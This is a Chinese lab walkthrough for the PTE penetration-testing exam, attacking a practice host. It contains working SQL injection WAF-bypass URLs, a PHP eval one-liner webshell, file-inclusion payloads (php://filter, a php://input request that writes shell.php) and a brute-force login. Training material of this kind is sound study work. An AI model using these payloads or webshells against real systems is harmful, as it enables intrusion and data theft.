CSIP-FTE考試專業題

靶場下載鏈接: https://pan.baidu.com/s/1ce1Kk0hSYlxrUoRTnNsiKA?pwd=ha1x

pte-2003密碼:admin123? ? ?centos:root admin123? ? 解壓密碼: ?PTE考試專用

下載好后直接用vmware打開,有兩個靶機,一個是基礎題,還有個綜合題。基礎題是pte-centos6,綜合題是pte-2003

打開基礎題pte-centos6后用vim設置靜態IP地址,虛擬機用net模式的話,就設置與你虛擬機同一個網段 vim /etc/sysconfig/network-scripts/ifcfg-eth0 設置好后reboot重啟一下即可,然后訪問81-85端口,共5題。因為靶場出了問題,只能打開第一題,建議按照原網絡環境去設置僅主機模式,原IP地址是172.16.12.100,虛擬機中的攻擊機也可以配置同網段僅主機模式即可,問題不大。pet-2003設置net模式就好了,發現用橋接模式掃描端口失敗 ?

//臨時關閉防火墻 service iptables stop

//禁止開機啟動 chkconfig iptables off

基礎題目之SQL注入

http://10.0.0.110:81/

進入答題?

1、利用order by獲取查詢列數信息?

?根據提示:select * from article where id= ('1');需閉合參數1')后插入sql查詢語句 order by 4,后注釋后面內容#

語句為: 1') order by 4#

填寫空格會自動消除;mysql%0a是換行,可以代替空格;#url編碼為%23

http://10.0.0.110:81/vulnerabilities/fu1.php?id=1%27)%0aorder%0aby%0a5%23

order by 5報錯;(為查詢是否有5個列)

http://10.0.0.110:81/vulnerabilities/fu1.php?id=1%27)%0aorder%0aby%0a4%23

order by 4顯示內容;(證明article表有4個列)?

2、 聯合查詢探測回顯數據

http://10.0.0.110:81/vulnerabilities/fu1.php?id=-1%27)%0aUNIunionON%0aselect%0a1,2,3,4%23

id=-1是嘗試利用的一個注入點,通過傳遞一個非法的ID值來觸發錯誤。

UNION注入:UNIunionON (union通過雙寫大小寫繞過)

注入SQL查詢:select 1,2,3,4%23

3、用load_file()函數【讀取/tmp/360/key文件】

load_file()是MySQL中的一個內置函數,用于從服務器文件系統中讀取文件內容

http://10.0.0.110:81/vulnerabilities/fu1.php?id=-1%27)%0aUNIunionON%0aselect%0a1,load_file(%27/tmp/360/key%27),3,4%23

select * from article where id= ('-1') UNION select 1,load_file('/tmp/360/key'),3,4#')

4、 成功獲取key

key:8b3h4a7v

基礎題目之文件上傳突破

http://10.0.0.110:82/

?文件上傳漏洞是指用戶上傳了一個可執行的腳本文件,并通過此腳本文件獲得了執行服務器端命令的能力。這種攻擊方式是最為直接和有效的,“文件上傳”本身沒有問題,有問題的是文件上傳后,服務器怎么處理、解釋文件。如果服務器的處理邏輯做的不夠安全,則會導致嚴重的后果。

????通過你所學到的知識,測試其過WAF濾規則,突破上傳獲取webshell,答案就在根目錄下key.php文件中。

1、嘗試上傳正常照片

?2、照片插入寫入一句話木馬

使用【edjpgcom】工具插入一句話

<?php @eval($_POST['chopper']);?>

?3、bp抓包改后綴名為php3

后綴名寫為php被攔截,改為php3特殊格式成功繞過(php2、php3、php4、phtml)

?4、蟻劍遠程webshell

http://10.0.0.110:82/vulnerabilities/12.php3

5、成功獲取key

key:8t5s0x5t

基礎題目之文件包含

http://10.0.0.110:83/

????PHP文件包含漏洞的產生原因是在通過PHP的函數引入文件時,由于傳入的文件名沒有經過合理的校驗,從而操作了預想之外的文件,就可能導致意外的文件泄露甚至惡意的代碼注入。

????通過你所學到的知識,測試該網站可能存在的包含漏洞,嘗試獲取webshell,答案就在根目錄下key.php文件中。

進入答題:

http://10.0.0.110:83/vulnerabilities/fu1.php?file=view.html

1、讀文件

http://10.0.0.110:83/vulnerabilities/fu1.php?file=php://filter/read=convert.base64-encode/resource=../key.php

  • php://filter: 是PHP中的一個輸入流過濾器,允許在讀取文件內容之前對其進行處理。
  • read=convert.base64-encode: 指定了過濾器的行為,即讀取的內容將被轉換為Base64編碼。
  • resource=../key.php: 指定要讀取的資源文件路徑。這里的../表示上一級目錄,意味著嘗試訪問當前目錄的父目錄下的key.php文件。

2、base64解碼:

3、成功獲取key

key:6u3x9t2p

?方式二:

?1、上傳一句話木馬

GET /vulnerabilities/fu1.php?file=php://input HTTP/1.1
Host: 10.0.0.110:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.0.0.110:83/vulnerabilities/fu1.php?file=page=php://filter/read=convert.base64-encode/resource=../key.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 67

<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>

2、 蟻劍webshell

http://10.0.0.110:83/vulnerabilities/shell.php

?

?3、成功獲取key

key:6u3x9t2p

基礎題目之日志分析

分析得知有大量訪問adminlogin.php

發現有一個登錄頁面?

Bp抓包進行暴力破解,獲得用戶名和密碼?

暴力破解到用戶名和密碼

用戶名:admin ??密碼:password123

登錄得到key

?成功獲取key:9y6u8s5m


聲明:

  • 此文章只做技術研究,謹遵守國家相關法律法規,請勿用于違法用途,如果您對文章內容有疑問,可以嘗試留言私信,如有侵權請聯系小編處理。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/44799.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/44799.shtml
英文地址,請注明出處:http://en.pswp.cn/web/44799.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

【CTF-Crypto】數論基礎-02

【CTF-Crypto】數論基礎-02 文章目錄 【CTF-Crypto】數論基礎-021-16 二次剩余1-20 模p下-1的平方根*1-21 Legendre符號*1-22 Jacobi符號*2-1 群*2-2 群的性質2-3 阿貝爾群*2-4 子群2-11 群同態2-18 原根2-21 什么是環2-23 什么是域2-25 子環2-26 理想2-32 多項式環 1-16 二次剩…

打造智慧校園德育管理,提升學生操行基礎分

智慧校園的德育管理系統內嵌的操行基礎分功能&#xff0c;是對學生日常行為規范和道德素養進行量化評估的一個創新實踐。該功能通過將抽象的道德品質轉化為具體可量化的指標&#xff0c;如遵守紀律、尊師重道、團結協作、愛護環境及參與集體活動的積極性等&#xff0c;為每個學…

醫療器械FDA |FDA網絡安全測試具體內容

醫療器械FDA網絡安全測試的具體內容涵蓋了多個方面&#xff0c;以確保醫療器械在網絡環境中的安全性和合規性。以下是根據權威來源歸納的FDA網絡安全測試的具體內容&#xff1a; 一、技術文件審查 網絡安全計劃&#xff1a;制造商需要提交網絡安全計劃&#xff0c;詳細描述產…

Matlab【光伏預測】基于雪融優化算法SAO優化高斯過程回歸GPR實現光伏多輸入單輸出預測附代碼

% 光伏預測 - 基于SAO優化的GPR % 數據準備 % 假設有多個輸入特征 X1, X2, …, Xn 和一個目標變量 Y % 假設數據已經存儲在 X 和 Y 中&#xff0c;每個變量為矩陣&#xff0c;每行表示一個樣本&#xff0c;每列表示一個特征 % 參數設置 numFeatures size(X, 2); % 輸入特征的…

Spring Boot集成easyposter快速入門Demo

1.什么是easyposter&#xff1f; easyposter是一個簡單的,便于擴展的繪制海報工具包 使用場景 在日常工作過程中&#xff0c;通常一些C端平臺會伴隨著海報生成與分享業務。因為隨著移動互聯網的迅猛發展&#xff0c;社交分享已成為我們日常生活的重要組成部分。海報分享作為…

visual studio 2019版下載以及與UE4虛幻引擎配置(過程記錄)(官網無法下載visual studio 2019安裝包)

一、概述 由于需要使用到UE4虛幻引擎&#xff0c;我使用的版本是4.27版本的&#xff0c;其官方默認的visual studio版本是2019版本的&#xff0c;相應的版本對應關系可以通過下面的官方網站對應關系查詢。https://docs.unrealengine.com/4.27/zh-CN/ProductionPipelines/Develo…

MMSegmentation筆記

如何訓練自制數據集&#xff1f; 首先需要在 mmsegmentation/mmseg/datasets 目錄下創建一個自制數據集的配置文件&#xff0c;以我的蘋果葉片病害分割數據集為例&#xff0c;創建了mmsegmentation/mmseg/datasets/appleleafseg.py 可以看到&#xff0c;這個配置文件主要定義…

python:使用matplotlib庫繪制圖像(四)

作者是跟著http://t.csdnimg.cn/4fVW0學習的&#xff0c;matplotlib系列文章是http://t.csdnimg.cn/4fVW0的自己學習過程中整理的詳細說明版本&#xff0c;對小白更友好哦&#xff01; 四、條形圖 1. 一個數據樣本的條形圖 條形圖&#xff1a;常用于比較不同類別的數量或值&…

3dmax-vray5大常用材質設置方法

3dmax云渲染平臺——渲染100 以高性價比著稱&#xff0c;是預算有限的小伙伴首選。 15分鐘0.2,60分鐘內0.8;注冊填邀請碼【7788】可領30元禮包和免費渲染券 提供了多種機器配置選擇(可以自行匹配環境)最高256G大內存機器&#xff0c;滿足不同用戶需求。 木紋材質 肌理調整&…

函數語意學(The Sematics of Function)

1、非靜態成員函數轉化為非成員函數 c 設計準則之一就是&#xff1a;非靜態成員函數至少和非成員函數有相同的效率。 也就是說下面兩個函數具有相同的效率&#xff1a; float magnitude(const Point3d * this){...}; float Point3d::magnitude(){...};以 float Point3d::mag…

練習9.5 彩票分析

練習 9.14&#xff1a;彩票 創建?個列表或元素&#xff0c;其中包含 10 個數和 5 個字 ?。從這個列表或元組中隨機選擇 4 個數或字?&#xff0c;并打印?條消息&#xff0c; 指出只要彩票上是這 4 個數或字?&#xff0c;就中?獎了。 練習 9.15&#xff1a;彩票分析 可以使…

面試題 05. 替換空格

05. 替換空格 題目描述示例 題解 題目描述 請實現一個函數&#xff0c;把字符串 s 中的每個空格替換成"%20"。 示例 示例1 輸入&#xff1a;s “We are happy.” 輸出&#xff1a;“We%20are%20happy.” 題解 class Solution { public:string replaceSpace(stri…

jQuery 元素選擇器集合

jQuery 提供了一套非常強大的元素選擇器&#xff0c;它們可以以各種方式定位和操作網頁文檔中的元素。 以下是 jQuery 中的一些常用選擇器&#xff1a; 1、基本選擇器 #id&#xff1a;選擇 ID 為 id 的元素。.&#xff08;類選擇器&#xff09;&#xff1a;選擇具有特定類的…

2.5 OJ 網站的使用與作業全解

目錄 1 OJ 網站如何使用 1.1 注冊賬戶 1.2 登錄賬戶 1.3 做題步驟 2 本節課的 OJ 作業說明 3 章節綜合判斷題 4 課時2作業1 5 課時2作業2 6 課時2作業3 1 OJ 網站如何使用 〇J 是英文 Online Judge 的縮寫&#xff0c;中文翻譯過來是在線判題。當用戶將自己編寫的代碼…

基于XC7VX690T FPGA+ZU15EG SOC的6U VPX總線實時信號處理平臺(支持4路光纖)

6U VPX架構&#xff0c;符合VITA46規范板載高性能FPGA處理器&#xff1a;XC7VX690T-2FFG1927I板載1片高性能MPSOC&#xff1a;XCZU15EG-2FFVB1156I板載1片MCU&#xff0c;進行健康管理、時鐘配置等V7 FPGA外掛2個FMC接口兩片FPGA之間通過高速GTH進行互聯 基于6U VPX總線架構的通…

從零開始做題:神奇的棋盤

題目 打開得到一副adfgvx加密棋盤 觀察txt數據只有1-5&#xff0c;猜測是數字字母坐標轉換&#xff0c;用notepad批量操作一下 解題 AGAXXDAGGVGGVDVADAVXDGADVGDVAADDDDFXAFAFDGDVXXDGGDGGDXDDFDDXVGXADGVDFXVVAADDXDXXADDVGGGXGXXXXGXXGGXGDVVVGGGAGAAAAGAAGGAGDDDAGAGGG…

解釋如單例、工廠、觀察者等常見設計模式在Android開發中的應用。

在Android開發中&#xff0c;設計模式的應用是提升代碼質量、增強可維護性和可擴展性的重要手段。單例模式&#xff08;Singleton&#xff09;、工廠模式&#xff08;Factory&#xff09;、觀察者模式&#xff08;Observer&#xff09;等是其中最為常見且實用的設計模式。下面我…

如何對已經存在的表進行加分區方案分區函數

我參考網上的&#xff0c;寫了2給存儲過程&#xff0c;一個初始創建文分區方案分區函數&#xff1b;一個可以通過作業新增文件組文件件&#xff1b; 但是初始沒有綁定表&#xff0c;網上的都是在創建表是綁定分區方案&#xff0c;但是我的表是已經存在的&#xff0c;怎么綁定 …

Python實現網站IP地址查詢

使用socket庫實現網站的ip地址查詢&#xff0c;以便于使用CC攻擊和DDoS攻擊&#xff08;鬧著玩的&#xff09; import socket def get_website_ip(website): try: ip socket.gethostbyname(website) return ip except socket.gaierror: retur…

最小數字游戲(Lc2974)——模擬+優先隊列(小根堆)、排序+交換

你有一個下標從 0 開始、長度為 偶數 的整數數組 nums &#xff0c;同時還有一個空數組 arr 。Alice 和 Bob 決定玩一個游戲&#xff0c;游戲中每一輪 Alice 和 Bob 都會各自執行一次操作。游戲規則如下&#xff1a; 每一輪&#xff0c;Alice 先從 nums 中移除一個 最小 元素&…